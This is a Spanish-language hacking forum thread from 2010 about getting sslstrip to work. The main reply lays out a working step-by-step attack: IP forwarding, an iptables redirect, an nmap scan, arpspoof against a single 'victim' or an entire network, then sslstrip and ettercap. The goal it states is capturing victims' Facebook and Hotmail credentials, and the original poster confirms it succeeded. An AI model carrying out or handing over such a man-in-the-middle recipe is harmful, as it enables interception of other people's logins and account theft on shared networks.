elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Problemas con sslstrip [SOLUCIONADO]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problemas con sslstrip [SOLUCIONADO]  (Leído 7,519 veces)
r3vz

Desconectado Desconectado

Mensajes: 4


r3vz


Ver Perfil WWW
Problemas con sslstrip [SOLUCIONADO]
« en: 12 Mayo 2010, 06:40 am »

Tengo el siguiente problema, veran he estado probando en mi red local sslstrip y no consigo capturar trafico de los sitios https.
veran lo que hago es lo siguiente
como root
echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo sslstrip -k -p -l 10000
sudo ettercap -Tq -M arp:remote -i eth1 // //
o si solo una victima
sudo ettercap -Tq -M arp:remote -i eth1 ipvictima iprouter
He probado con sitios que no son https y si funciona por lo que el mitm no es el problema, ahora cuando configuro el navegador a travez de proxy 127.0.0.1 10000, inicio sesion en hotmail o gmail en algunas de las maquinas victimas con o sin tener activado ettercap y   y ahi si captura :(

me imagino que el problema radica en la redireccion del trafico en iptables pero no estoy seguro. tengo el archivo /etc/etter.conf editado de la siguiente manera

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
bueno es la parte que interesa de archivo... si alguien le ha sucedido o tiene idea... tengo instalado apache y el puerto que usa es el 80, he parado apache y aun asi no funciona :(
« Última modificación: 23 Junio 2010, 13:51 pm por kamsky » En línea

felipao3010

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Problemas con sslstrip
« Respuesta #1 en: 20 Junio 2010, 07:18 am »

Hola, de seguro te servira mejor utilizando los siquientes pasos.  ;D



1. Lo primero que debemos hacer es conectarse a internet.  :xD

2. Abres una shell y escribes

     echo 1 > /proc/sys/net/ipv4/ip_forward
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
 
3*. Este paso es para identificar cualquier ip conectada a la red, es decir asi podremos realizar un ataque directo teniendo la ip de la ''victima''. (este paso no es necesario si vamos a atacar toda la red)
Abres una nueva shell y escribes
 
     nmap 192.168.1.1-254 (buscara del 192.168.1.1 al 192.168.1.254)


3. Ahora si vamos hacer el ataque hacia la ip de la victima o a toda la red.

  Ataque hacia una victima

     ip victima = 192.168.1.3
     puerta enlace(la respectica a tu router) = 192.168.1.1

     arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1

  Ataque a todos los computadores de la red  :o

     arpspoof -i wlan0 192.168.1.1

4. Abres una nueva shell y escribes

     sslstrip -a

5. Abres una nueva shell y escribes
     
     ettercap -T -q -i wlan0



Ahora esperar  :silbar: que la victima se conecte a facebook, hotmail..... etc, y te apareceran los datos en la ventana de ettercap, asi mismo sslstrip te genera un log en la carpeta home o root. ;-)
En línea

felipao3010

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Problemas con sslstrip
« Respuesta #2 en: 20 Junio 2010, 07:19 am »

Espero que lo hallas solucionado.   ::)
« Última modificación: 20 Junio 2010, 07:23 am por felipao3010 » En línea

r3vz

Desconectado Desconectado

Mensajes: 4


r3vz


Ver Perfil WWW
Re: Problemas con sslstrip
« Respuesta #3 en: 23 Junio 2010, 06:01 am »

Genial Bro me funcionado a la perfeccion te agradezco por tu tiempo saludos!!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
sslstrip en wifiway 2.0.2
Wireless en Linux
valdomero 1 3,725 Último mensaje 23 Marzo 2011, 23:07 pm
por valdomero
sslstrip & backtrack 5: No entra en la pagina
Redes
Gambino_88 1 4,868 Último mensaje 17 Junio 2011, 17:09 pm
por int_0x40
Ayuda con duda SSLStrip
Hacking
baran0wa 1 3,818 Último mensaje 29 Junio 2011, 04:05 am
por y0g-s0th0th
SSLStrip para Windows.
Hacking
Alfa015 0 6,782 Último mensaje 6 Septiembre 2011, 16:27 pm
por Alfa015
sslstrip y certificados
Hacking
winkpoo 7 7,241 Último mensaje 19 Diciembre 2011, 23:10 pm
por iancrowley
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines